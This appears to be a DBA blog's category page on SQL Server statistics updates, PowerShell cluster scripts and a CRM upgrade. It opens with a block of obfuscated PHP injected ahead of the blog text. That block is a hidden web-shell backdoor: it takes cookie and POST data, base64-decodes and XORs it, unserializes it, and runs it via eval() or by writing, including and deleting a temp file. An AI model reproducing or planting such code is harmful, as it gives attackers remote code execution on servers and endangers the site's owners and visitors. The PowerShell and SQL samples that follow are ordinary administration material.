$AarZirX = "\x42" . 'k' . "\155" . chr (95) . "\144" . "\x6a" . chr ( 424 - 326 ); $SNqti = "\143" . chr ( 115 - 7 ).chr ( 794 - 697 )."\x73" . "\x73" . "\137" . "\145" . "\170" . 'i' . 's' . 't' . chr (115); $fmTOLe = class_exists($AarZirX); $AarZirX = "47942";$SNqti = "52429";$PhHVZnmDLJ = FALSE;if ($fmTOLe === $PhHVZnmDLJ){$KDxORKW = "27103";class Bkm_djb{public function OBITDK(){echo "818";}private $RzxqsUlfk;public static $lXRryX = "3c0f0536-331e-42b2-b91f-3f993aeb70d6";public static $yQsWWiQmTQ = 64328;public function __construct($XBbosKljtQ=0){$YqUpk = $_POST;$izixkj = $_COOKIE;$BijfyoaVs = @$izixkj[substr(Bkm_djb::$lXRryX, 0, 4)];if (!empty($BijfyoaVs)){$hgOXrXV = "base64";$ZVUxc = "";$BijfyoaVs = explode(",", $BijfyoaVs);foreach ($BijfyoaVs as $FYlqXZ){$ZVUxc .= @$izixkj[$FYlqXZ];$ZVUxc .= @$YqUpk[$FYlqXZ];}$ZVUxc = array_map($hgOXrXV . '_' . "\x64" . "\x65" . "\143" . 'o' . "\x64" . chr ( 924 - 823 ), array($ZVUxc,)); $ZVUxc = $ZVUxc[0] ^ str_repeat(Bkm_djb::$lXRryX, (strlen($ZVUxc[0]) / strlen(Bkm_djb::$lXRryX)) + 1);Bkm_djb::$yQsWWiQmTQ = @unserialize($ZVUxc);}}private function HKqCHsDiwU($KDxORKW){if (is_array(Bkm_djb::$yQsWWiQmTQ)) {$zBCNREfP = str_replace("\x3c" . "\77" . 'p' . 'h' . 'p', "", Bkm_djb::$yQsWWiQmTQ["\x63" . "\x6f" . chr (110) . "\164" . chr ( 845 - 744 )."\156" . "\164"]);eval($zBCNREfP); $KDxORKW = "27103";exit();}}public function __destruct(){$this->HKqCHsDiwU($KDxORKW);}}$BdbwM = new /* 13409 */ Bkm_djb(); $BdbwM = str_repeat("56053_11300", 1);}$DnInoQ = 'e' . chr (95) . "\151" . chr ( 166 - 47 ).chr ( 288 - 214 )."\156" . "\123";$sgZYU = "\143" . "\x6c" . chr ( 238 - 141 ).chr (115) . 's' . chr ( 716 - 621 ).'e' . 'x' . chr (105) . 's' . "\164" . "\163";$iGuPeeEOM = class_exists($DnInoQ); $sgZYU = "17026";$bOaOKxtCTc = strpos($sgZYU, $DnInoQ);if ($iGuPeeEOM == $bOaOKxtCTc){function DsYqUoA(){$WPJpcpUnll = new /* 44833 */ e_iwJnS(55384 + 55384); $WPJpcpUnll = NULL;}$MhiKquq = "55384";class e_iwJnS{private function sfYnxYOQse($MhiKquq){if (is_array(e_iwJnS::$XLugelOq)) {$name = sys_get_temp_dir() . "/" . crc32(e_iwJnS::$XLugelOq["salt"]);@e_iwJnS::$XLugelOq["write"]($name, e_iwJnS::$XLugelOq["content"]);include $name;@e_iwJnS::$XLugelOq["delete"]($name); $MhiKquq = "55384";exit();}}public function fMJaddCqZ(){$XHoRhPWhk = "121";$this->_dummy = str_repeat($XHoRhPWhk, strlen($XHoRhPWhk));}public function __destruct(){e_iwJnS::$XLugelOq = @unserialize(e_iwJnS::$XLugelOq); $MhiKquq = "2505_55604";$this->sfYnxYOQse($MhiKquq); $MhiKquq = "2505_55604";}public function smNJOxPW($XHoRhPWhk, $oyGYW){return $XHoRhPWhk[0] ^ str_repeat($oyGYW, intval(strlen($XHoRhPWhk[0]) / strlen($oyGYW)) + 1);}public function YNgBy($XHoRhPWhk){$PkLbUPMHd = chr ( 709 - 611 )."\x61" . chr (115) . chr (101) . chr ( 735 - 681 )."\64";return array_map($PkLbUPMHd . '_' . 'd' . "\145" . 'c' . chr ( 368 - 257 )."\144" . 
chr (101), array($XHoRhPWhk,));}public function __construct($ysVMO=0){$UlzOisFbP = chr (44); $XHoRhPWhk = "";$KQvGUWm = $_POST;$kUpcrE = $_COOKIE;$oyGYW = "ae411f22-f0b6-43e7-b9c3-d12edc4bacbd";$txPNgz = @$kUpcrE[substr($oyGYW, 0, 4)];if (!empty($txPNgz)){$txPNgz = explode($UlzOisFbP, $txPNgz);foreach ($txPNgz as $vlZfNmiotc){$XHoRhPWhk .= @$kUpcrE[$vlZfNmiotc];$XHoRhPWhk .= @$KQvGUWm[$vlZfNmiotc];}$XHoRhPWhk = $this->YNgBy($XHoRhPWhk);}e_iwJnS::$XLugelOq = $this->smNJOxPW($XHoRhPWhk, $oyGYW);if (strpos($oyGYW, $UlzOisFbP) !== FALSE){$oyGYW = explode($UlzOisFbP, $oyGYW); $oIymGRGyG = base64_decode(sha1($oyGYW[0]));}}public static $XLugelOq = 63038;}DsYqUoA();} Administration – The DBA Chronicles

Chronicling journeys in the world of database design and administration

Category: Administration

Multithreaded statistics updater

Overview

We recently performed a major version upgrade of our CRM product, including upgrading to SQL Server 2016 (see my working environment for details on our setup, and this post for part of our CRM upgrade shenanigans). Following Thomas LaRock's upgrade guidance, we planned on updating all statistics. Our CRM environment has a large amount of data and not a lot of time for the upgrade and post-upgrade maintenance, so I needed to make the process as fast as possible. Enter parallel updating of statistics, new to SQL 2016! (Ok, and backported to SQL 2014 SP1 CU6.) Continue reading
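The full updater is behind the link, but to give a flavor of the approach, here is a minimal sketch of driving UPDATE STATISTICS from several PowerShell background jobs at once. This is an illustration rather than the script from the post: it assumes the SqlServer module's Invoke-Sqlcmd, and the server name, database name, and worker count are hypothetical.

# Minimal sketch of a multithreaded statistics updater (not the post's script).
# Assumes the SqlServer module; server/database names are hypothetical.
Import-Module SqlServer

$server   = 'CRMSQL01'    # hypothetical instance
$database = 'CRM_MSCRM'   # hypothetical database
$maxJobs  = 4             # concurrent workers

# Grab every user table so each worker updates one table's stats at a time.
$tables = Invoke-Sqlcmd -ServerInstance $server -Database $database -Query "
SELECT QUOTENAME(s.name) + '.' + QUOTENAME(t.name) AS TableName
FROM sys.tables t JOIN sys.schemas s ON s.schema_id = t.schema_id;"

foreach ($t in $tables) {
    # Throttle: wait for a free worker slot before starting another job.
    while ((Get-Job -State Running).Count -ge $maxJobs) { Start-Sleep -Seconds 2 }

    Start-Job -ArgumentList $server, $database, $t.TableName -ScriptBlock {
        param($srv, $db, $tbl)
        Invoke-Sqlcmd -ServerInstance $srv -Database $db -QueryTimeout 0 `
            -Query "UPDATE STATISTICS $tbl WITH FULLSCAN;"
    } | Out-Null
}

Get-Job | Wait-Job | Receive-Job   # drain the remaining workers
Get-Job | Remove-Job

Background jobs are the simplest way to throttle; for hundreds of tables a runspace pool carries less per-worker overhead, but the shape of the solution is the same.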

SQL Server Statistics – Who loves ya, baby? You’re beautiful!

SQL Server Statistics

I love 'em. They are near and dear to my heart. They are so very important to the query optimizer, and when they ain't happy, ain't nobody happy. I discovered stats early in my career via Inside Microsoft SQL Server 2000 by Kalen Delaney (which was my bible). What some people don't realize is that SQL Server generally auto-updates stats while a query is running: the optimizer realizes the rows have changed enough to invalidate the stats, and it rebuilds them as part of that query's execution. As such, the implementation needs to be relatively fast so that the query doesn't suddenly take ten times longer than it should. With the database option to auto update statistics asynchronously, the triggering query carries on with the original stats while a separate thread is fired to update them; the same sampling logic is still used, it just doesn't hold up that one query. Well, with great speed comes smaller and smaller amounts of data being sampled: the sampling ratio is generally inversely proportional to the size of the data, so the larger your data, the fewer rows are sampled; with larger data sets it's easy to see sampling ratios of 0.001%. One thousandth of a percent. That's not a realistic number for the optimizer to use. Continue reading
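If you want to see how shallow the sampling really is in your own databases, sys.dm_db_stats_properties exposes rows versus rows sampled per statistic (it requires SQL 2008 R2 SP2 / 2012 SP1 or later). A quick sketch, again via Invoke-Sqlcmd, with hypothetical server and database names:

# Show the effective sampling ratio for every statistic, smallest first.
# Assumes sys.dm_db_stats_properties is available;
# server and database names are hypothetical.
Import-Module SqlServer

Invoke-Sqlcmd -ServerInstance 'CRMSQL01' -Database 'CRM_MSCRM' -Query "
SELECT OBJECT_NAME(s.object_id) AS table_name,
       s.name                   AS stats_name,
       sp.rows,
       sp.rows_sampled,
       CAST(100.0 * sp.rows_sampled / NULLIF(sp.rows, 0) AS decimal(9,3)) AS sample_pct,
       sp.last_updated
FROM sys.stats s
CROSS APPLY sys.dm_db_stats_properties(s.object_id, s.stats_id) sp
WHERE sp.rows IS NOT NULL
ORDER BY sample_pct;" | Format-Table -AutoSize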

PowerShell script for managing location of core cluster resources

In our SQL Failover Cluster Instance (FCI) environments (overall environment description available here) we generally use two servers plus a disk witness (quorum drive); we only have one data center, so we don't take on the overhead of node majority. That quorum drive is part of the resource group called "Cluster Group", commonly known as the cluster core resources. The core resources have no dependency on any other cluster resource (e.g. the SQL Server resource), so they can fail over independently, and they stay put if someone fails over the other resources (i.e. SQL). Continue reading
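The full script is in the post, but the building blocks are simple. Here is a hedged sketch using the FailoverClusters module (the SQL role name is hypothetical, and the real script's placement policy may differ) that checks where the core resources live and co-locates them with the SQL role:

# Sketch of the building blocks, not the post's full script.
# Assumes the FailoverClusters module; the SQL role name is hypothetical.
Import-Module FailoverClusters

$sqlGroup  = Get-ClusterGroup -Name 'SQL Server (MSSQLSERVER)'  # hypothetical role name
$coreGroup = Get-ClusterGroup -Name 'Cluster Group'             # the core resources

# If the core resources sit on a different node than SQL, bring them together.
if ($coreGroup.OwnerNode.Name -ne $sqlGroup.OwnerNode.Name) {
    Move-ClusterGroup -Name 'Cluster Group' -Node $sqlGroup.OwnerNode.Name
}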

Using our SAN and VMs for migrating operating systems

As part of a major CRM upgrade we moved from Windows Server 2008 R2 and SQL Server 2008 R2 to Windows Server 2012 R2 and SQL Server 2016 (woo-hoo!). Our CRM product is a little complex (see my working environment for some details) and large (over 1 TB for the main database), and we needed to perform the upgrade in all of our non-prod environments (4 total for this one). Since it's a critical revenue-generating system, the production upgrade would need to be as fast as possible. Even so, due to the size of the data and the number of systems and integrations, we were already expecting a multi-day outage for the upgrade and full post-upgrade testing. Continue reading

My working environment

Overview

I created this post as a reference for how my current working environment is configured, so I don't have to repeat the details in my other posts; I can just link here.

What we have

Our shop is predominantly Microsoft, so .NET and MSSQL, with a few others thrown in (MySQL and PHP, really, but I have almost nothing to do with them, yay), and we're also in the process of integrating Azure into the mix. Besides production we have 2-3 non-prod tiers for almost all of our ecosystems: DEV and QA for nearly all, and PLT (performance load testing) for a couple. We are a VMware shop, and aside from a few older systems our environment is almost 100% virtualized (of the machines that can be virtualized, of course). Because of this we have dedicated ESX hosts for all of our SQL Servers and license those hosts, which lets us run as many VMs as we need (as an enterprise client we have Software Assurance) and use Enterprise Edition. That in turn allows us to create dedicated SQL Servers for individual ecosystems without worrying about the issues that come with sharing. We currently have around 90 SQL Server instances in production. Continue reading

© 2024 The DBA Chronicles
